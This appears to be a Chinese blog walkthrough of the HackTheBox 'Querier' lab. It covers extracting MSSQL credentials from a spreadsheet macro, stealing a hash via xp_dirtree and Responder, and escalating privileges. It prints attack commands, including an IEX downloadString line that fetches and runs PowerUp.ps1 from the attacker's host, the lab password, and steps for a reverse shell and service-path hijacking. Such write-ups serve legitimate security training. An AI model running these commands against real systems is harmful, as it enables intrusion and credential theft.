本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com
大余安全
大家好,这里是 大余安全 的第 83 篇文章,本公众号会每日分享攻防渗透技术给大家。
靶机地址:https://www.hackthebox.eu/home/machines/profile/175
靶机难度:中级(5.0/10)
靶机发布日期:2019 年 5 月 29 日
靶机描述:
Querier is a medium difficulty Windows box which has an Excel spreadsheet in a world-readable file share. The spreadsheet has macros, which connect to MSSQL server running on the box. The SQL server can be used to request a file through which NetNTLMv2 hashes can be leaked and cracked to recover the plaintext password. After logging in, PowerUp can be used to find Administrator credentials in a locally cached group policy file.
请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用 Kali Linux 作为解决该 HTB 的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。
一、信息收集
可以看到靶机的 IP 是 10.10.10.125....
在其他常见端口之间有 SMB 和 WinRM,MS-sql 也正在运行,这确认该域是 HTB.LOCAL...(和昨天那台靶机差不多?)
查看运行了哪些共享... 看到了 Reports 共享... 进去看看
在 reports 共享发现了 "Currency Volume Report.xlsm" 文件... 下载到本地发现这好像不是 xlsm 文件... 解压发现存在很多子文件... 开始一个一个查看...
查看 vbaProject.bin,在顶部附近找到带有凭据的连接字符串...
Uid=reporting;Pwd=PcwTWTHRwryjc$c6.... 这是 MSsql 的 ID 和密匙...
可以使用 impacket mssqlclient 模块连接到该靶机的 MSSQL 下...
mssqlclient.py -windows-auth reporting:PcwTWTHRwryjc\$c6@10.10.10.125
利用 mssqlclient 模块进来了...
发现不是 SA 用户... 无权限使用一些常规命令... 查看了用户情况,果然是无权限的...
虽然无法使用 xp_cmdshell 执行命令,但可以通过使用 xp_dirtree 或 xp_fileexist 来窃取 SQL 服务帐户的哈希...
开启 responder,然后 xp_dirtree 窃取了 SQL 服务的哈希值...
通过 john 破解哈希值.. 获得了密码...ID 是 mssql-svc
通过 ID 和密匙进来了...
查询后,返回 true,可以使用 xp_cmdshell
这里可以开始提权了... 利用 nishang 模块里的 Invoke-PowerShellTcp 即可
成功获得反向外壳...
以为有坑... 很正常的就获得了 user 信息...(和 NO80 有关系吧,这里的方法和前面的一样~~)
git clone https://github.com/PowerShellMafia/PowerSploit.git
PowerSploit 模块功能非常强大... 我试过绕过防病毒模块... 提权
这里准备利用 PowerUp.ps1 放到靶机服务器上进行扫描枚举...
已准备好...
IEX(New-Object Net.Webclient).downloadString('http://10.10.14.10/PowerUp.ps1'); Invoke-AllChecks
开始枚举... 这里发现有点问题,重新执行了下...
看到管理员凭据已缓存在 Groups.xml 文件中...
这里根据昨天朋友圈小伙伴的提醒,因为 445 端口开放着,我这里就使用了 psexec.py 进行获取 shell...
嗯,成功获得了 system 管理员权限...
成功获得了 root 信息...
方法 2:
Invoke-AllChecks 输出中,还可以看到有权写入 UsoSvc 服务...true
sc.exe qc UsoSvc 检查服务状态...
这里将修改服务的二进制路径... 注入 NC 服务,然后提权...
可以看到,获得了管理员权限... 但是 10 秒左右就断开了...
检查了会,重启服务后... 在开启...
还是存在 10~20 秒自动中断的现象,但是几秒足够获得 root 信息了... 这不影响,确确实实存在该问题!!
这里还可以利用文本形式写入 UsoSvc 服务中,直接读取任何管理员底层的信息... 在谈就到骇客了,谈远了
由于我们已经成功得到 root 权限查看 user.txt 和 root.txt,因此完成这台中等的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。
如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。
如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~
随缘收徒中~~ 随缘收徒中~~ 随缘收徒中~~
欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!
大余安全
一个全栈渗透小技巧的公众号